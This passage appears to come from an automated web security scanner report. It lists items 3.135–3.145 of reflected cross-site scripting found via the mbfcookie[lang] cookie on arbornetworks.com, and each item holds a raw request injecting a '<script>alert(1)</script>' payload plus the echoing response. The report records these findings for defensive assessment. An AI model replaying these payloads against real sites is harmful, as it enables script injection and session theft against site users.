Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=15aac11375f31ae52e77accbda94e455; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en804ae\"><script>alert(1)</script>00ecfe4a1d9">
...[SNIP]...

3.135. http://www.arbornetworks.com/en/channel-partners-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/channel-partners-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/channel-partners-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=12b1b857bef65e5f6a00e6c0acbfe617; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en1a0c4\"><script>alert(1)</script>58c339d6161">
...[SNIP]...

3.136. http://www.arbornetworks.com/en/com-5fcontent/view-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1eee34dce72c206720e7174b964eaccf; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en90b69\"><script>alert(1)</script>158d46c471b">
...[SNIP]...

3.137. http://www.arbornetworks.com/en/com-5fcontent/view-3.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/com-5fcontent/view-3.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/com-5fcontent/view-3.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d0846fcdd6654ed6ae07863593536390; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="endc0bb\"><script>alert(1)</script>910074bfd64">
...[SNIP]...

3.138. http://www.arbornetworks.com/en/contact-us-4.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ffb7b2b334dc66c05bfc0e48191fee6; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:20 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:21 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbfa46\"><script>alert(1)</script>3a748a1b21e">
...[SNIP]...

3.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d84e329f7da92c3b9806916aaf72b74b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en56d01\"><script>alert(1)</script>e5f9fcae8fd">
...[SNIP]...

3.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/customer-solution-briefs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6ffdd77ca83c0b6a8ec34466430c8f3a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:12 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en5d93e\"><script>alert(1)</script>110881cc17b">
...[SNIP]...

3.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=42b44ca8a06b1e8283bd881cdb5ffea3; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en68d52\"><script>alert(1)</script>29df373fe4f">
...[SNIP]...

3.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/ipv6-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=dfb89dd8541f4cde83a78802c4ae7fd8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:57:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:57:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4e8e4\"><script>alert(1)</script>c0ea527a00e">
...[SNIP]...

3.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/meet-our-partners.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=52ba42fdb49e26026c1037d4df0f9673; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en8e5c7\"><script>alert(1)</script>adb9c3d2480">
...[SNIP]...

3.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f6bf29a4fc59f7f5053553da10a007f5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en83849\"><script>alert(1)</script>0ce72120c8d">
...[SNIP]...

3.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-experts-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-experts-2.html HTTP/1.1
